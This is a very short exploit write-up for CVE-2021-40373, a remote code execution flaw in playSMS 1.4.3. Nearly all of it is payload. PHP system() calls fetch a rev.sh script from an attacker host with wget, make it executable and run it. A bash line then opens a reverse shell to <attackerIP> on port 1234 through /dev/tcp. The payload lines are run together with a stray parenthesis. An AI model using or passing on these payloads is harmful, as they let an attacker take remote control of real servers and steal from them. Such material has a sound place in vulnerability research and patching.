
CVE-2021-40373 - remote code execution
There is a vulnerability in playsms 1.4.3 that allows potential attackers to execute remote code execution.
<?php system("/usr/bin/wget http://<attackerIP>/rev.sh"); echo "done" ?><?php system("chmod +x rev.sh && ./rev.sh") ?>)#!/usr/bin/bash
bash -c "bash -i >& /dev/tcp/<attackerIP>/1234 0>&1"